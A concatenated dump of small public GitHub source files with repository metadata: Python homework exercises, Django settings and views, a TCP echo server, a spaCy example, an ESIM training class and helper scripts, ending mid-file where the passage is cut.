AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
base = int(input())
tar = int(input())
res = 0
fun = []
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1:
te += 1
break
mark = 0
while mark <= tem:
mark = pow(base,i)
i+=1
te+=i-3
mark/=base
tem-=mark
if tem!= 0:
te+=1
fun.append(te)
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1 or tem == -1:
te+=1
break
mark = 0
while mark < abs(tem):
mark = pow(base,i)
i+=1
te+=i-2
if tem < 0:
tem+=mark
elif tem>0:
tem-=mark
if tem != 0:
te+=1
fun.append(te)
print(min(fun))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
bc77d77f9880d9fc4b4e175cf37ac58d606f29d5
|
1879ada1df11f83dc0bedc69d06aea619adaf166
|
/collections/lists_01.py
|
c9f2ea884b9417ccaf46ae10ffecbe7c5832b192
|
[] |
no_license
|
larajorge11/python-davor-training
|
0ef4fdb6a07d570b2a233960842ce6bbec84af2d
|
5c14109a53896ead9eb5acac9e6fac1c83f5c406
|
refs/heads/main
| 2023-08-26T19:53:10.168900
| 2021-11-04T22:15:31
| 2021-11-05T16:04:45
| 339,914,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 904
|
py
|
# Las listas son mutables
nombres = ['Juan', 'Carla', 'Stefani', 'Jacobo', 'Bianca']
# Imprimir la lista de nombres
print(nombres)
# Accediendo a los elementos
print(nombres[0])
print(nombres[-1]) # Ultimo elemento de la lista
# Imprimir un rango
print(nombres[0:2])
print(nombres[:3])
print(nombres[2:])
nombres[1] = 'Davor'
for nombre in nombres:
print(nombre)
# Preguntar el largo de una lista
print(f'elementos de la lista {len(nombres)}')
# Adicionar nuevo elemento
nombres.append('Brandon')
print(nombres)
# Insertar con un indice especifico
nombres.insert(1, 'Octavio')
print(nombres)
# Eliminar un elemento
nombres.remove('Octavio')
print(nombres)
# Remover ultimo elemento de lista
nombres.pop()
print(nombres)
# Remover un elemento especifico
del nombres[0]
print(nombres)
# Limpiar la lista
nombres.clear()
print(nombres)
# Remover la lista en memoria
del nombres
print(nombres)
|
[
"larajorge11@gmail.com"
] |
larajorge11@gmail.com
|
f319f75c6eda9733cf3e2eea7ec0aba1aac4bbf7
|
43188f92d61c427b34b3806adee717a7f445e60d
|
/mdb/files/views.py
|
647b51ca298e3762ef9906d583995b8dc042e59d
|
[
"MIT"
] |
permissive
|
idbac/maldidb
|
c71205dddae7f337669b9c8b0abb245adc95dfb8
|
b926397c1d5f166d80f1eea5b3ba99dcef9b44dc
|
refs/heads/master
| 2023-08-01T03:31:24.358835
| 2021-09-11T16:37:07
| 2021-09-11T16:37:07
| 332,827,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
from django.shortcuts import render
from .models import UserFile
from django_tables2 import SingleTableView
from .tables import *
# ~ from .forms import *
from django.views.generic.list import ListView
from spectra_search.forms import FileLibraryForm
from chat.models import Library
class UserFilesListView(SingleTableView):
model = UserFile
table_class = UserFileTable
template_name = 'files/user_files.html'
def get_queryset(self, *args, **kwargs):
return UserFile.objects.filter(owner = self.request.user) \
.order_by('-upload_date') #last_modified
class FileUpload(ListView):
model = UserFile
template_name = 'files/file_upload.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['upload_form'] = FileLibraryForm(request = self.request)
u = self.request.user
print(f'self.request{self.request}')
print(f'u{u}')
# own libraries (library_select shares this qs)
q = Library.objects.filter(created_by__exact = u)\
.exclude(lab__lab_type = 'user-uploads')
context['upload_form'].fields['library_select'].queryset = q
return context
|
[
"davidshumway@gmail.com"
] |
davidshumway@gmail.com
|
b8ca63d31d28bcd4eed0f383b52286e292bb95cb
|
50f8a39a43c2f20953e77690d102eabefcb8c348
|
/venv/bin/gunicorn
|
ce4411beceb66e192ef16f8bdeb55039cf5ba357
|
[
"MIT"
] |
permissive
|
asandelarvine/News_App
|
0f5d5917643ded67f770ff60772197064f2e734b
|
393d8314586053024a0924b91d2e1912d12df2f4
|
refs/heads/main
| 2023-09-03T20:22:47.514495
| 2021-11-03T00:55:52
| 2021-11-03T02:00:05
| 422,500,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
#!/home/moringa/random/News_App/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"larvine.asande@student.moringaschool.com"
] |
larvine.asande@student.moringaschool.com
|
|
edd7334352747e1e9b08be0af986b1239e3ee6fe
|
5a25edcf994a760688dc7c933e8071bf4ff24df3
|
/exercises/ja/solution_01_08_01.py
|
01762ddd77ee431a33af88413c4449ddfc5b02bc
|
[
"CC-BY-NC-4.0",
"MIT"
] |
permissive
|
heyMP/spacy-course
|
8762990ed6179011680730d9c24d5d34c0a8d954
|
3740c717f0d1090b01c1b0fe23f8e30af3bf0101
|
refs/heads/master
| 2022-11-07T21:52:15.479840
| 2020-06-25T18:13:44
| 2020-06-25T18:13:44
| 275,202,487
| 1
| 0
|
MIT
| 2020-06-26T16:39:32
| 2020-06-26T16:39:31
| null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
import spacy
nlp = spacy.load("en_core_web_sm")
text = "It’s official: Apple is the first U.S. public company to reach a $1 trillion market value"
# テキストを処理
doc = nlp(text)
for token in doc:
# トークンの文字列、品詞タグ、依存関係ラベルを取得
token_text = token.text
token_pos = token.pos_
token_dep = token.dep_
# フォーマットしてプリント
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
|
[
"tamuhey@gmail.com"
] |
tamuhey@gmail.com
|
2f7b555b8a023acfc59b3616b78949d6bc53ab5f
|
3349a0d44da04fd9fae7728ce1315ccf0c82285e
|
/556A - case of zeroes and ones.py
|
c96ebf9ebc0e1aad3e01b362c37be5bd17da4cdb
|
[] |
no_license
|
umairnsr87/Data_Structures_Python
|
959848e546fd4f98959bc14470c26ce91bfb5c9c
|
05b5803521ed2ec7f64d95f08e2f014471dfdfd4
|
refs/heads/master
| 2023-07-18T12:11:55.245699
| 2023-07-16T17:01:09
| 2023-07-16T17:01:09
| 294,360,086
| 0
| 0
| null | 2023-07-16T17:01:10
| 2020-09-10T09:11:11
|
Python
|
UTF-8
|
Python
| false
| false
| 567
|
py
|
from collections import Counter
test = int(input())
strings = input()
# time complexity:O(n)
# while '01' or '10' in strings:
# if '01' in strings:
# strings = strings.replace('01', '')
# elif '10' in strings:
# strings = strings.replace('10', '')
# else:
# break
#
# print(len(strings))
# time complexity:O(1)
x = Counter(strings)
if (x['0'] == x['1']) and (x['0'] + x['1']) == len(strings):
print(0)
elif not x['1'] or not x['0']:
print(len(strings))
else:
a = min(x['0'], x['1'])
print(len(strings) - 2 * a)
|
[
"umairnsr87@gmail.com"
] |
umairnsr87@gmail.com
|
40b5a35183c69290d55869b4fcaa55d82c2b2f6b
|
a4956b95dea8412758af71fde5b06bee3575a06f
|
/Python/venv/Scripts/pip3-script.py
|
dee4588a446332bfe46f715e02399790b54880e8
|
[
"AFL-3.0"
] |
permissive
|
gzy23/myexercise
|
7188b9ba65562be118775502c4a63c4b5b6d8e67
|
471e45919c44efcb1a879dcade2ff5a87310e372
|
refs/heads/master
| 2022-11-18T22:42:36.622220
| 2020-07-08T10:05:33
| 2020-07-08T10:05:33
| 276,901,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
#!F:\gitwork\Python\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
|
[
"gzy_email@2430866021.com"
] |
gzy_email@2430866021.com
|
40654b027f3ff750ac5224e44425c099db471f46
|
8ed759d055c99133eb58d229f291295e77f98286
|
/tcpServer.py
|
43a185103fe5cf01da6efda01f6f455eaa40aa4f
|
[] |
no_license
|
anjali-92/Python
|
67b6fca149604cc6ac81b553c8775f9c9c62f0ab
|
353355c0f95dae0ea956c77111314435e4f30d59
|
refs/heads/master
| 2020-12-28T21:06:38.782775
| 2020-11-19T11:39:59
| 2020-11-19T11:39:59
| 33,402,958
| 0
| 0
| null | 2016-09-23T05:31:33
| 2015-04-04T11:11:00
|
Python
|
UTF-8
|
Python
| false
| false
| 434
|
py
|
# Echo server program
import socket
HOST = '' # Symbolic name meaning all available interfaces
PORT = 50011 # Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(5)
for i in range(0,2):
conn ,addr = s.accept()
print 'Connected by',addr
data = conn.recv(1024)
if not data: break
conn.sendall(data)
conn.close()
s.close()
|
[
"anjalipardeshi92@gmail.com"
] |
anjalipardeshi92@gmail.com
|
afcad36fd990355b106a0e1875b71d72f6cde7f2
|
09911dfbc5b9e994599f15cac7d330582a8e7761
|
/guess.py
|
6870e1ff8bc64281f9fc02dc742c07278dd510fd
|
[] |
no_license
|
Xemicolon/NumberGuessingGame
|
2b05163495598f250f91aaf3ab12da443761ea6b
|
fada9df2420a6171f9e8075b4b8dd76596cf1991
|
refs/heads/master
| 2022-04-24T20:24:12.517192
| 2020-04-21T21:29:58
| 2020-04-21T21:29:58
| 257,325,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 808
|
py
|
from random import randint
def guessTheNumber(difficulty, range, chances):
computer = randint(1, range)
level = str(difficulty)
chances = chances
print(f'Difficulty level: {level}\nChances: {chances}')
while True:
try:
user_input = int(input(f'Guess the number between 1 - {range}: '))
chances -= 1
print(f'Chances you have left: {chances}')
if user_input == computer:
print(f'✅ You got it right!')
break
else:
print(f'❌ That was wrong.')
if chances == 0:
print(f'Game over! You exhausted your chances 😖\n')
break
except ValueError:
print(f'⚠ Please enter a whole number or integer.')
|
[
"1vibenation@gmail.com"
] |
1vibenation@gmail.com
|
eaed1474671f49ae000323f1a00774c7a2c81b26
|
6d54a7a75768fe25dcdc56958f6ab215ac8a92d9
|
/to_do_app/settings.py
|
8bf0d1509732b00159e8c1429647634ce9838e4a
|
[] |
no_license
|
yigitkarabiyik/To-Do-App
|
f3362729230b0af0299a4969df3cff9ebe344457
|
b18e68b9b5ae4b547fab7a0a196a4879aa0055bd
|
refs/heads/main
| 2023-03-11T02:30:23.656828
| 2021-03-02T09:08:48
| 2021-03-02T09:08:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,427
|
py
|
"""
Django settings for to_do_app project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates/')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ylp!o9@47kfr$ql!5#he4fv-k96a30o$$-aa_853hfd2_)(x(0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['127.0.0.0','0.0.0.0']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app_to_do_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware'
]
ROOT_URLCONF = 'to_do_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'to_do_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorege'
|
[
"yigitkarabiyik8@gmail.com"
] |
yigitkarabiyik8@gmail.com
|
3e74f996fc5b64ab1e959cc5a5966dd6c8d6023d
|
8cbb7291096499bd2cefc0bfe9acfdfa0baa1fcc
|
/script_main.py
|
b25feb3f1ae4ad8a1bda1a8f345e4b594389d45c
|
[] |
no_license
|
a1015970/SSE_Exercise2
|
944cbae3c9458ae038fba5e97f27b4fd96873d1c
|
377b3cd496f0ed6bdd446913c980d626a416ac8f
|
refs/heads/master
| 2020-07-18T18:13:41.365392
| 2019-09-29T08:04:04
| 2019-09-29T08:04:04
| 206,290,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,487
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 6 22:45:02 2019
@author: Chris Crouch - a1015970
"""
import analyze_git_commit
from git import Repo, RemoteProgress
import os
class Progress(RemoteProgress):
def update(self, op_code, cur_count, max_count=None, message=''):
print(self._cur_line)
#%%
local_link = "../camel"
remote_link = "https://github.com/apache/camel"
fixing_commit = "235036d2396ae45b6809b72a1983dee33b5ba32"
if not os.path.isdir(local_link):
Repo.clone_from(remote_link, local_link, progress=Progress())
repo = Repo(local_link)
print("\n\n", repo.git.remote('get-url','origin'))
analyze_git_commit.analyze_git_commit(local_link, fixing_commit)
#%%
local_link = "../junit-plugin"
remote_link = "https://github.com/jenkinsci/junit-plugin"
fixing_commit = "15f39fc49d9f25bca872badb48e708a8bb815ea7"
if not os.path.isdir(local_link):
Repo.clone_from(remote_link, local_link, progress=Progress())
repo = Repo(local_link)
print("\n\n", repo.git.remote('get-url','origin'))
analyze_git_commit.analyze_git_commit(local_link, fixing_commit)
#%%
local_link = "../jackson-databind"
remote_link = "https://github.com/FasterXML/jackson-databind"
fixing_commit = "7487cf7eb14be2f65a1eb108e8629c07ef45e0a"
if not os.path.isdir(local_link):
Repo.clone_from(remote_link, local_link, progress=Progress())
repo = Repo(local_link)
print("\n\n", repo.git.remote('get-url','origin'))
analyze_git_commit.analyze_git_commit(local_link, fixing_commit)
|
[
"a1015970@student.adelaide.edu.au"
] |
a1015970@student.adelaide.edu.au
|
f3f53ccefea07832363a3f36b3f24a3daba97a46
|
5898a72d228beb1779ec68247ab89c3391c84ebd
|
/cgi-bin/getWaitingGame.py
|
49b4dbfd7587db29b40a73b4bf55fa6d897686d9
|
[] |
no_license
|
sirramsalott/boggle
|
1a2f1035fc219b3df6edcafaadead0375e62037a
|
242eca21ea982ed7fafec499ff9b18d7e1cd70d6
|
refs/heads/master
| 2022-12-14T06:01:38.561493
| 2020-09-04T08:36:10
| 2020-09-04T08:36:10
| 249,944,772
| 0
| 0
| null | 2022-12-12T16:02:38
| 2020-03-25T10:08:22
|
Python
|
UTF-8
|
Python
| false
| false
| 509
|
py
|
#!/usr/bin/python
import cgi, sys, json, cgitb
from boggleUser import Pupil
def response(pupilID):
g = Pupil.getWaitingGame(pupilID)
out = {"found": bool(g)}
if g:
Pupil(pupilID=pupilID).isWaiting(False)
out.update(g)
outJ = json.dumps(out)
return """Status: 200 OK
Content-Type: application/json
Content-Length: {}
{}""".format(len(outJ), outJ)
if __name__ == '__main__':
cgitb.enable()
post = cgi.FieldStorage()
print response(int(post['pupilID'].value))
|
[
"jfr573@cs.bham.ac.uk"
] |
jfr573@cs.bham.ac.uk
|
01a663efab3a49d161c2793fb093704b775a3579
|
32d9ca9bda3d132179e952e3bd94f99f5de2d0cb
|
/train.py
|
420b4f7a24b35b604145e6f28bac12ecdc80322f
|
[] |
no_license
|
mcao516/PyTorch-ESIM
|
280efbae434d680ff0cce4b31ac00f772a9626de
|
5f01cebae70a8401cec61c89939d32da7c7a01df
|
refs/heads/master
| 2022-02-19T12:28:16.041379
| 2019-10-04T15:30:44
| 2019-10-04T15:30:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,146
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.tensorboard import SummaryWriter
from torch.optim.lr_scheduler import MultiStepLR
from sklearn.metrics import classification_report
from ESIM import ESIM
from utils import Progbar, to_device
class Model:
"""Enhanced Sequential Inference Model (ESIM) for natural language inference.
"""
def __init__(self, args):
"""Class initialization.
"""
self.args = args
self.logger = args.logger
# initialziation
self.model = self._build_model()
self.model.to(args.device)
self._initialize_model(self.model)
self.optimizer = self._get_optimizer(self.model)
self.scheduler = self._get_scheduler(self.optimizer)
self.criterion = self._get_criterion()
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
self.logger.info("- Let's use {} GPUs !".format(torch.cuda.device_count()))
self.model = nn.DataParallel(self.model)
else:
self.logger.info("- Train the model on single GPU :/")
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
self.logger.info("- Let's do distributed training !")
self.model = nn.parallel.DistributedDataParallel(self.model,
device_ids=[args.local_rank],
output_device=args.local_rank)
# tensorboard
if args.write_summary and args.local_rank in [-1, 0]:
self.logger.info("- Let's use tensorboard on local rank {} device :)".format(args.local_rank))
self.writer = SummaryWriter(self.args.summary_path)
def _build_model(self):
"""Build ESIM model.
"""
return ESIM(self.args.vector_size,
self.args.vocab_size,
self.args.hidden_size,
self.args.class_num,
self.args.dropout)
def _initialize_model(self, model):
"""Initialize ESIM model paramerters.
"""
for p in model.parameters():
if p.dim() > 1:
nn.init.uniform_(p, a=-0.1, b=0.1)
def initialize_embeddings(self, vectors):
"""Load pre-trained word embeddings.
"""
if isinstance(self.model, nn.DataParallel):
self.model.module.load_embeddings(vectors)
else:
self.model.load_embeddings(vectors)
def _set_parameter_requires_grad(self):
"""Specify which parameters need compute gradients.
"""
# we don't need this right now
pass
def _get_optimizer(self, model):
"""Get optimizer for model training.
"""
if self.args.optimizer == 'sgd':
optimizer = optim.SGD(model.parameters(),
lr=self.args.lr,
momentum=self.args.momentum)
elif self.args.optimizer == 'adam':
optimizer = optim.Adam(model.parameters(), lr=self.args.lr)
else:
self.logger.info("Unknow optimizer: {}, exiting...".format(self.args.optimizer))
exit()
return optimizer
def _get_scheduler(self, optimizer):
"""Get scheduler for adjusting learning rate.
"""
return MultiStepLR(optimizer, milestones=[25], gamma=0.1)
def _get_criterion(self):
"""Loss function.
"""
return nn.CrossEntropyLoss()
def load_weights(self, model_dir):
"""Load pre-trained model weights.
"""
self.model.load_state_dict(torch.load(os.path.join(model_dir, "esim.pickle")))
def save_model(self, model_dir=None):
"""Save model's weights.
"""
if not model_dir:
model_dir = self.args.model_dir
torch.save(self.model.state_dict(), os.path.join(model_dir, "esim.pickle"))
self.logger.info("- ESIM model is saved at: {}".format(
os.path.join(model_dir, "esim.pickle")))
def loss_batch(self, p, h, labels, criterion, optimizer=None):
"""
Arguments:
p {torch.Tensor} -- premise [batch, seq_len]
h {torch.Tensor} -- hypothesis [batch, seq_len]
labels {torch.Tensor} -- hypothesis [batch]
criterion {torch.nn.Loss} -- loss function
Keyword Arguments:
optimizer {torch.optim.Optimizer} -- PyTorch optimizer
Returns:
logits {torch.Tensor} -- raw, unnormalized scores for each class
with shape [batch, class_num]
"""
logits = self.model(p, h)
loss = criterion(logits, labels)
if self.args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if optimizer is not None:
with torch.set_grad_enabled(True):
loss.backward() # compute gradients
nn.utils.clip_grad_norm_(self.model.parameters(),
self.args.max_grad_norm)
optimizer.step() # update model parameters
optimizer.zero_grad() # clean all gradients
return loss.item(), logits.detach()
def train_epoch(self, train_iter, criterion, optimizer, epoch):
"""Train the model for one single epoch.
"""
self.model.train() # set the model to training mode
prog = Progbar(target=len(train_iter))
train_loss = 0.0
for i, batch in enumerate(train_iter):
batch_data = to_device(batch, self.args.device)
batch_loss, _ = self.loss_batch(batch_data['premise'],
batch_data['hypothesis'],
batch_data['label'],
criterion,
optimizer=optimizer)
train_loss += batch_loss
prog.update(i + 1, [("train loss", batch_loss)])
if self.args.local_rank in [-1, 0] and self.writer:
self.writer.add_scalar('batch_loss', batch_loss, epoch*len(train_iter) + i + 1)
# compute the average loss (batch loss)
epoch_loss = train_loss / len(train_iter)
# update scheduler
self.scheduler.step()
return epoch_loss
def evaluate(self, dev_iter, criterion):
"""Evaluate the model.
"""
self.model.eval() # set the model to evaluation mode
with torch.no_grad():
eval_loss, eval_corrects = 0.0, 0.0
for _, batch in enumerate(dev_iter):
batch_data = to_device(batch, self.args.device)
batch_loss, outputs = self.loss_batch(batch_data['premise'],
batch_data['hypothesis'],
batch_data['label'],
criterion,
optimizer=None)
_, preds = torch.max(outputs, 1) # preds: [batch_size]
eval_loss += batch_loss
eval_corrects += torch.sum(preds == (batch_data['label'])).double()
avg_loss = eval_loss / len(dev_iter)
avg_acc = eval_corrects / len(dev_iter.dataset)
return avg_loss, avg_acc
def fit(self, train_iter, dev_iter):
"""Model training and evaluation.
"""
best_acc = 0.
num_epochs = self.args.num_epochs
for epoch in range(num_epochs):
self.logger.info('Epoch {}/{}'.format(epoch + 1, num_epochs))
# training
train_loss = self.train_epoch(train_iter, self.criterion, self.optimizer, epoch)
self.logger.info("Traing Loss: {}".format(train_loss))
# evaluation, only on the master node
if self.args.local_rank in [-1, 0]:
eval_loss, eval_acc = self.evaluate(dev_iter, self.criterion)
self.logger.info("Evaluation:")
self.logger.info("- loss: {}".format(eval_loss))
self.logger.info("- acc: {}".format(eval_acc))
# monitor loss and accuracy
if self.writer:
self.writer.add_scalar('epoch_loss', train_loss, epoch)
self.writer.add_scalar('eval_loss', eval_loss, epoch)
self.writer.add_scalar('eval_acc', eval_acc, epoch)
# self.writer.add_scalar('lr', self.scheduler.get_lr()[0])
# save the model
if eval_acc >= best_acc:
best_acc = eval_acc
self.logger.info("New best score!")
self.save_model()
def predict(self, premise, hypothesis):
"""Prediction.
Arguments:
premise {torch.Tensor} -- [batch, seq_len]
hypothesis {torch.Tensor} -- [batch, seq_len]
Returns:
pres {torch.Tensor} -- [batch]
"""
self.model.eval() # evaluation mode
with torch.no_grad():
outputs = self.model(premise, hypothesis) # outpus: [batch, num_classes]
_, preds = torch.max(outputs, 1)
return preds
def get_report(self, dataset, target_names=None):
"""Test the model and print out a report.
"""
pred_class, label_class = [], []
for batch in dataset:
batch_data = to_device(batch, self.args.device)
preds = self.predict(batch_data['premise'], batch_data['hypothesis'])
pred_class += preds.tolist()
label_class += (batch_data['label']).tolist()
self.logger.info('\n')
self.logger.info(classification_report(label_class, pred_class,
target_names=target_names))
return pred_class, label_class
|
[
"c_meng@outlook.com"
] |
c_meng@outlook.com
|
5b5c8f567d442b7d3f5b766199727996bd5699bd
|
e994e9c74a7f4b95ed28ce53e86d5715769f8137
|
/admin/feeds/urls.py
|
3de1c6809fcd64f66f348291763e01d4c58179d6
|
[] |
no_license
|
wechulimaven/lutterD-jangoA-PI
|
0773c07a78d3a78c46d374499b82251beaffa6e7
|
c932d1fd0969cdb7d1f0057c6a4f284768e0bef3
|
refs/heads/main
| 2023-03-22T09:16:29.873629
| 2021-03-20T23:19:40
| 2021-03-20T23:19:40
| 349,767,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
from django.urls import path
from .views import UserRecordView, feedEditAddPostList, feedPostsList
urlpatterns = [
path('', feedPostsList.as_view()),
path('<int:pk>/', feedEditAddPostList.as_view()),
path('user/', UserRecordView.as_view(), name='users'),
]
|
[
"mavenwechuli@gmail.com"
] |
mavenwechuli@gmail.com
|
e607164ee72ed5d0071b455388700dbe366a225e
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_windlasses.py
|
6ee113296ad40900fcef0fed2db7fb643eaa9caf
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
#calss header
class _WINDLASSES():
def __init__(self,):
self.name = "WINDLASSES"
self.definitions = windlass
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['windlass']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
0e3874a0fdfbd8a253c22505d38822612cf2a233
|
78c25dc9d381286209565e94ab24fe10a0924137
|
/bigneuron_app/fleet/tasks.py
|
58f2a8b4209f809a15c437c0550b8ecd4916a62a
|
[] |
no_license
|
Freshwood/vaa3d-api
|
c8c5d044c355685395d7b433e90d7759cad88b08
|
aeb3f22b2ab384f98d8ed0657645008430e78135
|
refs/heads/master
| 2020-05-27T23:59:34.053831
| 2016-02-06T18:58:01
| 2016-02-06T18:59:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 479
|
py
|
import time
import traceback
from bigneuron_app import tasks_log
from bigneuron_app.fleet import fleet_manager
FLEET_UPDATE_SLEEP=60
FLEET_UPDATE_MAX_RUNS=20
def update_fleet():
count = 0
while count < FLEET_UPDATE_MAX_RUNS:
try:
tasks_log.info("Update Jobs and JobItems Fleets. Attempt " + str(count))
fleet_manager.update_fleet_capacity()
except Exception, err:
tasks_log.error(traceback.format_exc())
finally:
count += 1
time.sleep(FLEET_UPDATE_SLEEP)
|
[
"fortuner@amazon.com"
] |
fortuner@amazon.com
|
8c8e0126b4969636ebe2d414567e598beb70bf2c
|
e9a9955da9bee9be6580f1b1a75f97a1f99d0289
|
/login/migrations/0016_auto_20190803_1452.py
|
eb4f2ea18f1fff82b8ba290db60a29457a52f715
|
[] |
no_license
|
Manjunatha1997/project_IT
|
bdb36142256b9d4eb1b75a76994d801dd3c33013
|
fe58a30d033d4f4ed818c0282a802fafcf3aaff5
|
refs/heads/master
| 2021-02-28T04:17:13.872903
| 2020-03-07T15:48:49
| 2020-03-07T15:48:49
| 245,661,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 637
|
py
|
# Generated by Django 2.1.7 on 2019-08-03 14:52
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0015_auto_20190803_0435'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='dob',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693918)),
),
migrations.AlterField(
model_name='profile',
name='doj',
field=models.DateField(default=datetime.datetime(2019, 8, 3, 14, 52, 29, 693948)),
),
]
|
[
"lovelymanju198@gmail.com"
] |
lovelymanju198@gmail.com
|
9a78b5d66a23140e8ef2d9c21dd84cfc729271a3
|
701d7413adc68a4f05fbb96e7981646e7bb3bee8
|
/fh/opl/Solutions-session5/Solutions-new/ex4_perfectsupto.py
|
1359ad1d660fc5f4bd7d0338157b238316a8e3a7
|
[] |
no_license
|
emildekeyser/tutoring
|
ee9311a0b65879284d33cdf154de3dac6b735f03
|
512593cd96247ae84c619a64279d0051c3ac16f9
|
refs/heads/master
| 2020-11-27T01:39:48.486085
| 2019-12-20T12:25:35
| 2019-12-20T12:25:35
| 197,552,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
# Calculate the sum of all divisors of n
def sum_of_proper_divisors(n):
s = 1
for i in range(2, n):
# Check if i divides n and if it does, add it to the sum s
if n % i == 0:
s += i
return s
def is_perfect(n):
return n == sum_of_proper_divisors(n)
def perfects_up_to(n):
for i in range(2,n):
if is_perfect(i):
# Print consecutive i's on the same line
print(i, end="\t")
def main():
n = int(input("Enter a number: "))
